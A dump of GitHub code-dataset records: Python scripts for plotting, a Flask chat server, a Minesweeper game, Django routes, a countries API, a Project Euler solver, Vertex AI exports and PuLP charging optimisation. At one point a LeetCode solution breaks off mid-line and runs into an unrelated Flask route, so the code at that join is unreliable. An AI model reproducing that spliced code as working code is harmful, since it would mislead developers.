M200/result2\n\nMenc_NFW = np.array([])\nfor i in r:\n result1, _ = quad(lambda r: 4*np.pi*rho_prof_NFW(r, C1)*r**2, 1e-3, i)\n Menc_NFW = np.append(Menc_NFW, result1)\n \nMenc_CORED = np.array([])\nfor i in r:\n result2, _ = quad(lambda r: 4*np.pi*rho_prof_CORED(r, C2)*r**2, 1e-3, i)\n Menc_CORED = np.append(Menc_CORED, result2)\n\n# Plot enclosed mass vs distance from center \n \nplt.figure()\nplt.loglog()\nplt.xlabel('r/r200')\nplt.ylabel('M((km/s)')\nplt.plot(M200, sigma_los_NFW, '-', label = 'NFW');\nplt.plot(M200, sigma_los_CORED, '-', label = 'cored');\nplt.gca().set_yticks([1e0, 1e1])\nplt.gca().set_xticks([1e8, 1e9, 1e10, 1e11])\nplt.legend();\n\n\n# In[3]:\n\n\nx = .234*np.random.poisson(0, 25)\nprint(x)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"DivinaIsCool/Su23","sub_path":"Fig4 Reproduce (2).py","file_name":"Fig4 Reproduce (2).py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32180017228","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/11/30 23:00\n# @Author : QXTD-LXH\n# @Desc :\nimport flask\nfrom chat import Chat\nimport traceback\nimport json\nfrom cfg import get_logger\n\nserver = flask.Flask(__name__)\nlogger = get_logger()\nmodel = Chat(logger)\n\n\n@server.route('/qianyan', methods=['get', 'post'])\ndef qianyan():\n try:\n sample = flask.request.args.get('input')\n # sample = flask.request.get_data()\n logger.info('Data: {}'.format(sample))\n sample = json.loads(sample)\n response = model.chat(sample)\n logger.info('Response: {}'.format(response))\n return response\n except Exception as e:\n exc_info = 'Cal Exception: {}'.format(e)\n logger.info('Exception: {}'.format(traceback.format_exc()))\n logger.info('exc info: {}'.format(exc_info))\n return flask.jsonify({\n \"error code\": 1,\n \"response\": \"error: {}\".format(exc_info)\n })\n\n\n@server.route('/test', methods=['get', 'post'])\ndef test():\n return 'Success !!'\n\n\n# you pig\nserver.run(port=2112, debug=False, host='0.0.0.0', threaded=True)\n","repo_name":"apple55bc/CCF-BDCI-qianyan","sub_path":"code/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"68"} +{"seq_id":"3605107503","text":"\nimport turtle\nimport random\n\nclass Cell:\n def __init__(self,xmin=0,ymin=0,width=1,height=1):\n self.__xmin = xmin\n self.__ymin = ymin\n self.__xmax = self.__xmin + width\n self.__ymax = self.__ymin + height\n self.__t = turtle.Turtle()\n self.__t.hideturtle()\n self.__t.speed(0)\n self.__bomb = False\n self.__cleared = False\n\n\n def isIn(self,x,y):\n if x > self.__xmin and x < self.__xmax and y > self.__ymin and y < self.__ymax:\n return True\n\n else:\n return False\n\n def setBomb(self):\n self.__bomb = True\n\n def isBomb(self):\n return self.__bomb\n\n\n def clear(self):\n self.__cleared = True\n self.draw()\n\n def isCleared(self):\n return self.__cleared\n\n\n def showcount(self,c):\n centerx = (self.__xmax + self.__xmin)/2\n centery = (self.__ymax + self.__ymin)/2\n self.__t.penup()\n self.__t.goto(centerx,centery)\n self.__t.write(c,align=\"center\", font=(\"Arial\",10,\"normal\"))\n\n def draw(self):\n self.__t.hideturtle()\n self.__t.penup()\n self.__t.goto(self.__xmin,self.__ymin)\n\n if self.isBomb():\n self.__t.pendown()\n self.__t.fillcolor(\"red\")\n self.__t.begin_fill()\n self.__t.goto(self.__xmax,self.__ymin)\n self.__t.goto(self.__xmax,self.__ymax)\n self.__t.goto(self.__xmin,self.__ymax)\n self.__t.goto(self.__xmin,self.__ymin)\n self.__t.end_fill()\n self.__t.penup()\n centerx = (self.__xmax + self.__xmin)/2\n centery = (self.__ymax + self.__ymin)/2\n self.__t.goto(centerx,centery)\n self.__t.write(\"*\",font=(\"Arial\",10,\"normal\"))\n\n\n elif self.isCleared():\n self.__t.pendown()\n self.__t.fillcolor(\"gray\")\n self.__t.begin_fill()\n self.__t.goto(self.__xmax,self.__ymin)\n self.__t.goto(self.__xmax,self.__ymax)\n self.__t.goto(self.__xmin,self.__ymax)\n self.__t.goto(self.__xmin,self.__ymin)\n self.__t.end_fill()\n\n\n else:\n self.__t.pendown()\n self.__t.fillcolor(\"green\")\n self.__t.begin_fill()\n self.__t.goto(self.__xmax,self.__ymin)\n self.__t.goto(self.__xmax,self.__ymax)\n self.__t.goto(self.__xmin,self.__ymax)\n self.__t.goto(self.__xmin,self.__ymin)\n self.__t.end_fill()\n\n\n\nclass Minesweeper:\n def __init__(self,rows=14,columns=14,mines=15,bombsvis=False):\n self.__grid = []\n self.__t = turtle.Turtle()\n self.__s = self.__t.getscreen()\n self.__t.speed(0)\n self.__s.onclick(self.__mouseClick)\n self.__s.listen()\n self.__s.tracer(1000,0)\n self.__s.update()\n scale = 10*max(rows,columns)\n turtle.setworldcoordinates(-.5*scale,-.5*scale,3/2*scale,3/2*scale)\n #scales the grid based on how many rows/columns there are - grid always takes up same amount of screen space.\n self.__t.hideturtle()\n\n\n counter1 = 0\n gridcolumns = []\n y = 0\n x = 0\n\n\n while counter1 < rows: #making a nested list of cells\n width = 10\n height = 10\n counter1 += 1\n x = 0\n counter2 = 0\n\n while counter2 < columns:\n newcell = Cell(x,y,width,height)\n gridcolumns.append(newcell)\n counter2 += 1\n x += width\n newcell.draw()\n self.__s.update()\n self.__grid.append(gridcolumns)\n y += height\n gridcolumns = []\n\n\n remainingmines = 0\n while remainingmines < mines: #sets # of mines based on given argument\n newminex = random.randint(0,columns-1)\n newminey = random.randint(0,rows-1)\n if self.__grid[newminey][newminex].isBomb() == False:\n self.__grid[newminey][newminex].setBomb()\n remainingmines += 1\n\n\n if bombsvis:\n counter1 = 0\n while counter1 < columns:\n counter2 = 0\n while counter2 < rows:\n if self.__grid[counter1][counter2].isBomb():\n self.__grid[counter1][counter2].draw()\n counter2 += 1\n counter1 +=1\n\n def countBombs(self,row,col):\n numberofbombs = 0\n for y in range(row - 1, row + 2):\n for x in range(col - 1, col + 2):\n if self.__grid[y][x].isBomb():\n numberofbombs += 1\n return numberofbombs\n\n def cellsRemaining(self):\n cellsnum = 0\n for a in range(0,len(self.__grid)):\n for b in range(0,len(self.__grid[0])):\n if not self.__grid[a][b].isCleared() and not self.__grid[a][b].isBomb():\n cellsnum += 1\n return(cellsnum)\n\n\n def getRowCol(self,x,y):\n if x/10 < len(self.__grid) and x/10 > 0 and y/10 < len(self.__grid[0]) and y/10 > 0:\n return (x/10),(y/10)\n else:\n return (-1,-1)\n\n\n def __mouseClick(self,x,y):\n (x,y) = self.getRowCol(x,y)\n row = int(y)\n col = int(x)\n\n if x != -1 and y != -1: #to make sure clicking outside grid doesn't clear cell [-1,-1]\n if not self.__grid[row][col].isCleared():\n\n if self.__grid[row][col].isBomb():\n self.__t.penup()\n self.__t.goto(25,-20)\n self.__t.pendown()\n self.__t.write(\"You lose, loser\", font=(\"Arial\",45,\"normal\"),align=\"center\") #plz don't be offended i just thought this was funny\n self.__t.penup()\n self.__t.goto(25,-30)\n self.__t.pendown()\n self.__t.write(\"Click mouse to exit\", font=(\"Arial\",25,\"normal\"),align=\"center\")\n\n counter1 = 0\n while counter1 < len(self.__grid):\n counter2 = 0\n while counter2 < len(self.__grid[0]):\n if self.__grid[counter1][counter2].isBomb():\n self.__grid[counter1][counter2].draw()\n counter2 += 1\n counter1 +=1\n self.__s.update()\n self.__s.exitonclick()\n\n else:\n self.clearCell(row,col)\n\n if self.cellsRemaining() == 0:\n self.__t.penup()\n self.__t.goto(25,-20)\n self.__t.pendown()\n self.__t.write(\"You win, winner!\", font=(\"Arial\",45,\"normal\"),align=\"center\")\n self.__t.penup()\n self.__t.goto(25,-30)\n self.__t.pendown()\n self.__t.write(\"Click mouse to exit\", font=(\"Arial\",25,\"normal\"),align=\"center\")\n\n\n counter1 = 0\n while counter1 < len(self.__grid):\n counter2 = 0\n while counter2 < len(self.__grid[0]):\n if self.__grid[counter1][counter2].isBomb():\n self.__grid[counter1][counter2].draw()\n counter2 += 1\n\n counter1 +=1\n self.__s.exitonclick()\n\n\n\n\n def clearCell(self,row,col):\n\n self.__grid[row][col].clear()\n\n\n if self.hasneighborMine(row,col) == 0:\n for a in range(row-1,row+2):\n if a >= 0 and a < len(self.__grid):\n for b in range(col-1,col+2):\n if b >= 0 and b < len(self.__grid[0]):\n if not self.__grid[a][b].isCleared():\n self.__s.update() #had to update in here to avoid glitchiness for the cell clearing, bit slower but smoother animation - you can keep playing as it clears\n self.clearCell(a,b)\n\n\n\n\n\n\n def hasneighborMine(self,row,col): #added method that checks for neighbors for the recursive clear cell\n minenumber = 0\n for y in range(row-1,row+2):\n if y >= 0 and y < len(self.__grid):\n for x in range(col-1,col+2):\n if x >= 0 and x < len(self.__grid[0]):\n if self.__grid[y][x].isBomb():\n\n minenumber += 1\n if minenumber > 0:\n self.__grid[row][col].showcount(minenumber)\n return minenumber\n\n\n\n\n\n\ndef main():\n\n newgame = Minesweeper(15,15,14)\n\nif __name__ == '__main__':\n main()\n","repo_name":"EmilyKolb/happygolucky","sub_path":"minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":8817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70945570457","text":"# Author: Deendayal Kumawat\n\"\"\" Date: 22/12/19\nDescriptions: Loop\"\"\"\n\nnum = int(input(\"Enter any Numer...........\"))\nprime = True\nfor i in range(2, num):\n if num % i == 0 :\n prime = False\n break\nif prime:\n print(\"This is Prime Number\")\nelse:\n print(\"This is not Prime Number\")\n","repo_name":"ddsha441981/Python-Sample-Code","sub_path":"chapter_07_Loops_in_Python/practice_07/practice_05.py","file_name":"practice_05.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"14519535019","text":"\"\"\"proyecto_tarea URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib.auth import views as auth_views\nfrom . import views\nfrom django.urls import path, include\nfrom .views import VendedorListar, VendedorNueva, VendedorBorrar, VendedorEditar, PolizaListar, PolizaNueva \\\n , HospitalListar, HospitalNuevo, HospitalEditar, HospitalBorrar, AseguradoNuevo, AseguradoEditar, AseguradoBorrar, \\\n AseguradoListar, PolizaEditar, PolizaBorrar, index, ContratoPoliza, ContratoPolizaListar, home, TemplateSinPrivilegio, \\\n DoctorNuevo, DoctorBorrar, DoctorEditar, DoctorListar, FamiliaresBorrar, FamiliaresEditar, FamiliaresListar, \\\n FamiliaresNuevo, HospitalizacionNuevo, HospitalizacionBorrar, HospitalizacionListar, HospitalizacionEditar, \\\n TratamientoNuevo, TratamientoBorrar, TratamientoEditar, TratamientoListar, DetalleTratamientoNuevo, \\\n DetalleTratamientoBorrar, DetalleTratamientoEditar, DetalleTratamientoListar, AseguradoFamiliarLista, ContratoPolizaEditar, \\\n ContratoPolizaBorrar\nfrom .reportes import reporte_vendedores, reporte_contrato\n\nurlpatterns = [\n path('home', home, name='home'),\n path(\"vendedores/\", VendedorListar.as_view(), name=\"vendedor_listar\"),\n path(\"vendedores/nuevo/\", VendedorNueva.as_view(), name=\"vendedor_nuevo\"),\n path(\"vendedores/editar/\", VendedorEditar.as_view(), name=\"vendedor_editar\"),\n path(\"vendedores/borrar/\", VendedorBorrar.as_view(), name=\"vendedor_borrar\"),\n\n path(\"polizas/\", PolizaListar.as_view(), name=\"poliza_listar\"),\n path(\"polizas/nuevo/\", PolizaNueva.as_view(), name=\"poliza_nuevo\"),\n path(\"polizas/editar/\", PolizaEditar.as_view(), name=\"poliza_editar\"),\n path(\"polizas/borrar/\", PolizaBorrar.as_view(), name=\"poliza_borrar\"),\n\n path(\"hospitales/\", HospitalListar.as_view(), name=\"hospital_listar\"),\n path(\"hospitales/nuevo/\", HospitalNuevo.as_view(), name=\"hospital_nuevo\"),\n path(\"hospitales/editar/\", HospitalEditar.as_view(), name=\"hospital_editar\"),\n path(\"hospitales/borrar/\", HospitalBorrar.as_view(), name=\"hospital_borrar\"),\n\n path(\"asegurados/nuevo/\", AseguradoNuevo.as_view(), name=\"asegurado_nuevo\"),\n path(\"asegurados/editar/\", AseguradoEditar.as_view(), name=\"asegurado_editar\"),\n path(\"asegurados/borrar/\", AseguradoBorrar.as_view(), name=\"asegurado_borrar\"),\n path(\"asegurados/\", AseguradoListar.as_view(), name=\"asegurado_listar\"),\n\n # path(\"\", views.loginpage, name=\"loginpage\"),\n # path(\"login/\", views.loginpage, name=\"loginpage\"),\n path(\"\", auth_views.LoginView.as_view(template_name='cha_app/login.html'), name=\"login\"),\n path(\"\", auth_views.LogoutView.as_view(template_name='cha_app/login.html'), name=\"logout\"),\n path('sin_privilegios/', TemplateSinPrivilegio.as_view(), name='sin_privilegios'),\n # path(\"login/\", auth_views.LoginView.as_view(template_name='cha_app/login.html'), name=\"login\"),\n path(\"contratos/\", ContratoPolizaListar.as_view(), name=\"contrato_listar\"),\n path(\"contratos/nuevo/\", ContratoPoliza.as_view(), name=\"contrato_nuevo\"),\n path(\"contratos/editar/\", ContratoPolizaEditar.as_view(), name=\"contrato_editar\"),\n path(\"contratos/borrar/\", ContratoPolizaBorrar.as_view(), name=\"contrato_borrar\"),\n\n path(\"doctor/nuevo/\", DoctorNuevo.as_view(), name=\"doctor_nuevo\"),\n path(\"doctor/editar/\", DoctorEditar.as_view(), name=\"doctor_editar\"),\n path(\"doctor/borrar/\", DoctorBorrar.as_view(), name=\"doctor_borrar\"),\n path(\"doctor/\", DoctorListar.as_view(), name=\"doctor_listar\"),\n\n path(\"familiares/nuevo/\", FamiliaresNuevo.as_view(), name=\"familiares_nuevo\"),\n path(\"familiares/editar/\", FamiliaresEditar.as_view(), name=\"familiares_editar\"),\n path(\"familiares/borrar/\", FamiliaresBorrar.as_view(), name=\"familiares_borrar\"),\n path(\"familiares/\", AseguradoFamiliarLista.as_view(), name=\"familiares_listar\"),\n path(\"familiares/listar/\", FamiliaresListar.as_view(), name=\"familiares_asegurado_listar\"),\n\n path(\"reportes/vendedores/\", reporte_vendedores, name='vendedores_print_all'),\n path(\"reportes/contratos/\", reporte_contrato, name='contrato_print'),\n\n path(\"hospitalizaciones/nuevo/\", HospitalizacionNuevo.as_view(), name=\"hospitalizaciones_nuevo\"),\n path(\"hospitalizaciones/editar/\", HospitalizacionEditar.as_view(), name=\"hospitalizaciones_editar\"),\n path(\"hospitalizaciones/borrar/\", HospitalizacionBorrar.as_view(), name=\"hospitalizaciones_borrar\"),\n path(\"hospitalizaciones/\", HospitalizacionListar.as_view(), name=\"hospitalizaciones_listar\"),\n\n path(\"tratamientos/nuevo/\", TratamientoNuevo.as_view(), name=\"tratamiento_nuevo\"),\n path(\"tratamientos/editar/\", TratamientoEditar.as_view(), name=\"tratamiento_editar\"),\n path(\"tratamientos/borrar/\", TratamientoBorrar.as_view(), name=\"tratamiento_borrar\"),\n path(\"tratamientos/\", TratamientoListar.as_view(), name=\"tratamiento_listar\"),\n\n\n path(\"detalletratamientos/nuevo/\", DetalleTratamientoNuevo.as_view(), name=\"detalletratamiento_nuevo\"),\n path(\"detalletratamientos/editar/\", DetalleTratamientoEditar.as_view(), name=\"detalletratamiento_editar\"),\n path(\"detalletratamientos/borrar/\", DetalleTratamientoBorrar.as_view(), name=\"detalletratamiento_borrar\"),\n path(\"detalletratamientos/listar/\", DetalleTratamientoListar.as_view(), name=\"detalletratamiento_listar\"),\n]\n","repo_name":"edgarahl/entornovirtual","sub_path":"entvirt/script/proyecto_tarea/cha_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6105,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70897567576","text":"# leetcode problem number 410 \ndef findPices(nums , target):\n pices = 1\n tempSum = 0\n if (len(nums) <1):\n return 0\n \n for number in nums: \n tempSum += number\n if(tempSum > target):\n pices += 1\n tempSum = number\n return pices\n \n\n \n\ndef splitArray(nums , m):\n start = max(nums)\n end = sum(nums)\n\n while start \", methods=[\"GET\"])\ndef get_top_10(parameter):\n parameter = parameter.lower().strip()\n\n if parameter not in [\"population\", \"area\", \"density\"]:\n result = jsonify({\n \"message\": \"The only valid parameters for this \\\n endpoint are: population, area, density.\"\n })\n return result\n\n try:\n cursor = mysql.connection.cursor()\n\n query = \"SELECT * FROM countries ORDER BY {} DESC\".format(parameter)\n cursor.execute(query)\n records = cursor.fetchall()[:10]\n\n result = []\n for record in records:\n country = {\n \"name\": record[0],\n \"capital\": record[1],\n \"language\": record[2].replace(\"\\\"\", \"\"),\n \"population\": record[3],\n \"density (per km2)\": record[4],\n \"area (km2)\": record[5],\n \"time_zone\": record[6],\n \"currency\": record[7],\n \"government\": record[8]\n }\n result.append(country)\n\n result = Response(json.dumps(result), mimetype=\"application/json\")\n except:\n result = jsonify({\n \"message\": \"There was a problem reading from the database.\"\n })\n finally:\n cursor.close()\n \n return result\n\n\"\"\"\nThe /all endpoint. Returns every entry in the database that fulfills\na certain condition, given by the query parameters.\n\"\"\"\n@app.route(\"/all\", methods=[\"GET\"])\ndef get_all():\n args = request.args\n pairs = []\n values = []\n\n # The format of the database query depends on which set\n # of query parameters was given\n for key in [\"name\", \"capital\", \"population\", \n \"density\", \"area\", \"currency\"]:\n if key in args:\n pairs.append(\"lower(\" + key + \") = %s\")\n values.append(args[key].lower().strip())\n\n for key in [\"language\", \"government\"]:\n if key in args:\n pairs.append(\"lower(\" + key + \") LIKE %s\")\n values.append(\"%\" + args[key].lower().strip() + \"%\")\n \n if \"time_zone\" in args:\n value = args[\"time_zone\"].lower().strip()\n\n if (\"+\" not in value) and (\"-\" not in value):\n pairs.append(\"lower(time_zone) = %s\")\n values.append(value)\n else:\n if \"+\" in value:\n split = value.split(\"+\")\n sign = \"+\"\n else:\n split = value.split(\"-\")\n sign = \"-\"\n\n pairs.append(\"lower(time_zone) = %s \\\n OR lower(time_zone) = %s \\\n OR lower(time_zone) = %s \\\n OR lower(time_zone) = %s\")\n values.append(value)\n values.append(value + \":00\")\n values.append(split[0] + sign + \"0\" + split[1])\n values.append(split[0] + sign + \"0\" + split[1] + \":00\")\n \n # If no valid query parameters are provided, it will return\n # information about every single country found in the database\n if len(pairs) == 0:\n pairs = [\"1\"]\n \n try:\n cursor = mysql.connection.cursor()\n\n query = \"SELECT * FROM countries WHERE {}\".format(\" AND \".join(pairs))\n cursor.execute(query, values)\n records = cursor.fetchall()\n\n result = []\n for record in records:\n country = {\n \"name\": record[0],\n \"capital\": record[1],\n \"language\": record[2].replace(\"\\\"\", \"\"),\n \"population\": record[3],\n \"density (per km2)\": record[4],\n \"area (km2)\": record[5],\n \"time_zone\": record[6],\n \"currency\": record[7],\n \"government\": record[8]\n }\n result.append(country)\n\n result = Response(json.dumps(result), mimetype=\"application/json\")\n except:\n result = jsonify({\n \"message\": \"There was a problem reading from the database.\"\n })\n finally:\n cursor.close()\n\n return result\n\n\"\"\"The main function that allows the API to run.\"\"\"\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"vanessahoamea/States-of-the-World","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23389976726","text":"#! python\nimport sys\nimport math\n\n\ndef getN(i):\n cnt = 0;\n ranges = (i/math.sqrt(2));\n for j in range(math.ceil(i/2.0-ranges),0):\n if i*i/2-(i/2-j)*(i/2-j)<0:\n print(str(i*i/2)+ \" \" + str((i/2-j)*(i/2-j)))\n test = math.sqrt(i*i/2-(i/2-j)*(i/2-j))+i/2;\n if( test==math.floor(test)):\n cnt+=1; \n return cnt\n cnt = (cnt * 2 + 1) * 4;\n \n #print(str(i) + \" | \" + str(cnt) + \" | \" + str((cnt-4)/8));\npossible = []\ndef recursive(past):\n base = 1\n tnp = list(past)\n for i in range(len(past)):\n base *=(2*past[i])+1\n number = 0\n while(1==1):\n number+=1\n n = (base*(2*number+1)-1)/2\n if n==52:\n retString = \"\"\n for i in range(len(past)):\n retString += str(past[i]) + \" \"\n retString += str(number)\n print(retString)\n elif n>52:\n break\n else:\n tnp.append(number)\n recursive(tnp)\n tnp.pop()\n\ndef isPrime(number):\n if(number<2):\n return False\n for i in range(2,math.floor(math.ceil(number))):\n if number%i==0:\n return False\n return True\n#print(getN(171640625))\narray = []\nrecursive(array)\n\ntotal = 0\nlimit3 = 10**11\n\nlimit = 4733728\nd2 = dict()\nd = dict()\nfor i in range(1,100000):\n base = i*i\n #print(i)\n if base>limit:\n break\n #print(i)\n for j in range((i%2)+1,i,2):\n #print(j)\n baseJ = base + j*j\n if baseJ == 117:\n print(str(i) + \" | \" + str(j) + \" | \" + str(baseJ))\n if baseJ>limit:\n break\n #if (not isPrime(baseJ)):\n # break\n else:\n key = math.floor(baseJ)\n #print(key)\n if key in d:\n d[key] += 1\n else:\n d[key] = 1\n for k in range(1,limit):\n x = k * baseJ\n if x>limit:\n break\n else:\n key = math.floor(x)\n #print(key)\n if key in d2:\n d2[key] += 1\n else:\n d2[key] = 1\nprint(\"done\")\n\nlimit2 = 278455\n\ndic = dict()\nPrime = dict()\nfor w in d:\n if d[w]==1 and d2[w]==1:\n dic[w] = 1\n for i in range(w,limit2,w):\n Prime[i] = 1\nprint(\"done2\")\n\n\nnonPrime = dict()\nfor i in range (1, limit2):\n if not i in Prime:\n nonPrime[i] = 1\nprint(\"done3\")\n\nnonPrime = sorted(nonPrime)\n\nPrimes = sorted(dic)\n\n'''sys.exit()\nfor w in Primes:\n print(w)\nsys.exit()'''\n\nfor w in Primes:\n #print(w)\n base1 = w*w*w\n if base1>limit3:\n break;\n for e in Primes:\n #print(e)\n if w == e:\n continue\n base2 = base1*e*e\n if base2>limit3:\n break;\n for r in Primes:\n if r == w or r == e:\n continue\n num = base2*r\n if num>limit3:\n break\n multiplier = 0\n limit4 = math.floor(limit3/num)\n if limit4>limit2:\n print(\"what\" + str(limit4))\n for t in nonPrime:\n #print(t)\n if t > limit4:\n break\n multiplier += t\n total += multiplier*num\n #print(w*w*w*e*e*r)\n\n\n\nfor w in Primes:\n #print(w)\n base1 = w**10\n if base1>limit3:\n break;\n for e in Primes:\n #print(e)\n if w == e:\n continue\n base2 = base1*e*e\n if base2>limit3:\n break;\n multiplier = 0\n limit4 = math.floor(limit3/base2)\n for t in nonPrime:\n #print(t)\n if t > limit4:\n break\n multiplier += t\n total += multiplier*base2\n\n\nfor w in Primes:\n #print(w)\n base1 = w**7\n if base1>limit3:\n break;\n for e in Primes:\n #print(e)\n if w == e:\n continue\n base2 = base1*e*e*e\n if base2>limit3:\n break;\n #print(str(w) + \" | \" + str(e) + \" | \" + str(base2))\n multiplier = 0\n limit4 = math.floor(limit3/base2)\n for t in nonPrime:\n if t > limit4:\n break\n #print(t)\n multiplier += t\n total += multiplier*base2\nprint(total)\n\n#for w in d:\n# print(w)\nsys.exit()\n\nd = dict()\nfor i in range(1,100000):\n base = i*i\n if base>10**4:\n break\n #print(i)\n for j in range((i%2)+1,i,2):\n #print(j)\n baseJ = base + j*j\n if baseJ>10**4:\n break\n else:\n key = math.floor(baseJ)\n #print(key)\n if key in d:\n d[key] += 1\n else:\n d[key] = 1\n '''for k in range(1,100000):\n x = k * baseJ\n if x == 325:\n print (str(i) + \" | \" + str(j) + \" | \" + str(k))\n if x>10**4:\n break\n else:\n key = math.floor(x)\n #print(key)\n if key in d:\n d[key] += 1\n else:\n d[key] = 1'''\ndic = dict()\nfor w in sorted(d, key=d.get, reverse=True):\n for k in range(1,100000):\n x = k * w\n if x == 1105:\n print (str(w) + \" | \" + str(d[w]) + \" | \" + str(k))\n if x>10**4:\n break\n else:\n key = math.floor(x)\n #print(key)\n if key in dic:\n dic[key] += d[w]\n else:\n dic[key] = d[w]\nfor key in dic:\n if key == 1105:\n print(str(key) + \" | \" + str(dic[key]))\n if dic[key] == 52:\n print(key)\n \n\n\n\n\n\n#getN(359125)\n\n#for i in range(math.floor((10**11)/((5**3)*(13**2)))):\n'''for i in range(1000):\n if(isPrime(i)):\n cnt = getN(i)\n if cnt==1:\n print(i)\n elif cnt>1:\n print(str(i) + \" \" + str(cnt))\n'''\n\n\n\n'''cnt = 0;\ntest = 0;\nranges = 0;\nmaxes = 0;\nnumbers_sizes = (29*13*13*17*17*5**exp for exp in range(0, 13))\nnumbers_sizes = ((17**a)*(13**b)*(5**c) for a in range(0, 4) for b in range(0, 4) for c in range(0, 4))\nfor i in numbers_sizes: #range(3,220):\n cnt = 0;\n ranges = (i/1.41421356);\n for j in range(math.ceil(i/2.0-ranges),0):\n test = math.sqrt(i*i/2-(i/2-j)*(i/2-j))+i/2;\n if( test==math.floor(test)):\n cnt+=1; \n cnt = (cnt * 2 + 1) * 4;\n \n print(str(i) + \" | \" + str(cnt) + \" | \" + str((cnt-4)/8));\n'''\n\n\n\n\n'''x^52\nx*y^17\nx^2+\n\n(x)(2y+1)(2z+1) + yx(min(x,y,z))\n\n\n2zx+x+z\n\na=zx+(z+1)/2\n\nx(2y+1)(2z+1)+((2y+1)(2z+1)+1)/2-1\n\n((2x+1)(2y+1)(2z+1)-1)/2'''","repo_name":"rorico/Side-Projects","sub_path":"Project Euler/233.py","file_name":"233.py","file_ext":"py","file_size_in_byte":6688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26560927280","text":"from google.cloud.aiplatform.metadata import metadata\n\nfrom vertexai.preview import developer\nfrom vertexai.preview import hyperparameter_tuning\nfrom vertexai.preview import initializer\nfrom vertexai.preview import tabular_models\nfrom vertexai.preview._workflow.driver import (\n remote as remote_decorator,\n)\nfrom vertexai.preview._workflow.shared import (\n model_utils,\n)\n\n\nglobal_config = initializer.global_config\ninit = global_config.init\nremote = remote_decorator.remote\nVertexModel = remote_decorator.VertexModel\nregister = model_utils.register\nfrom_pretrained = model_utils.from_pretrained\n\n# For Vertex AI Experiment.\n\n# ExperimentRun manipulation.\nstart_run = metadata._experiment_tracker.start_run\nend_run = metadata._experiment_tracker.end_run\nget_experiment_df = metadata._experiment_tracker.get_experiment_df\n\n# Experiment logging.\nlog_params = metadata._experiment_tracker.log_params\nlog_metrics = metadata._experiment_tracker.log_metrics\nlog_time_series_metrics = metadata._experiment_tracker.log_time_series_metrics\nlog_classification_metrics = metadata._experiment_tracker.log_classification_metrics\n\n\n__all__ = (\n \"init\",\n \"remote\",\n \"VertexModel\",\n \"register\",\n \"from_pretrained\",\n \"start_run\",\n \"end_run\",\n \"get_experiment_df\",\n \"log_params\",\n \"log_metrics\",\n \"log_time_series_metrics\",\n \"log_classification_metrics\",\n \"developer\",\n \"hyperparameter_tuning\",\n \"tabular_models\",\n)\n","repo_name":"googleapis/python-aiplatform","sub_path":"vertexai/preview/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":433,"dataset":"github-code","pt":"68"} +{"seq_id":"5025653457","text":"\"\"\"\nCollection of functions for Smart Chargng\n\"\"\"\nfrom pulp import *\nimport numpy as np\nimport plotly.graph_objects as go\nimport datetime\nimport pandas as pd\nfrom sklearn_extra.cluster import KMedoids\n\ndef PerfectForesight(b0, bmax, bmin, xmax, c, c_tilde, u, z, T, tvec, r=1, verbose=True):\n # Init problem \n prob = LpProblem(\"mpc1\", LpMinimize)\n\n # Init variables\n x = LpVariable.dicts(\"x\", tvec, lowBound=0, upBound=xmax, cat='Continuous')\n b = LpVariable.dicts(\"b\", np.append(tvec,T+1), lowBound=0, upBound=bmax*1.25, cat='Continuous')\n s = LpVariable.dicts(\"s\", tvec, lowBound=0, upBound=0.25*bmax, cat='Continuous')\n s2 = {i: LpVariable(\"s2_\"+str(i), lowBound=0, upBound=ub, cat='Continuous') for i, ub in enumerate(bmin)}\n b[0] = b0\n\n # Objective\n prob += lpSum([c[t]*x[t] for t in tvec] - c_tilde * (b[T+1]-b[0]) + [100*c_tilde*(s[t]+s2[t+1]) for t in tvec])\n\n # Constraints\n for t in tvec:\n prob += b[t+1] == b[t] + x[t]*r - u[t]\n prob += b[t+1] >= bmin[t+1] - s2[t+1]\n prob += b[t+1] <= bmax + s[t]\n prob += x[t] <= xmax * z[t]\n prob += x[t] >= 0\n\n # Solve problem\n if verbose:\n prob.solve(PULP_CBC_CMD(msg=1))\n else:\n prob.solve(PULP_CBC_CMD(msg=0))\n\n # Return objective without penalization\n prob += lpSum([c[t]*x[t] for t in tvec] - c_tilde * (b[T+1]-b[0]))\n\n # Return results\n return(prob, x, b)\n\ndef ImperfectForesight(b0, bmax, bmin, xmax, c, c_tilde, u_t_true, u_forecast, z, T, tvec, r, verbose=False):\n # Init problem \n prob = LpProblem(\"mpc1\", LpMinimize)\n\n # Init variabless\n x = LpVariable.dicts(\"x\", tvec, lowBound=0, upBound=xmax, cat='Continuous')\n b = LpVariable.dicts(\"b\", np.append(tvec,T+1), lowBound=0, upBound=5000, 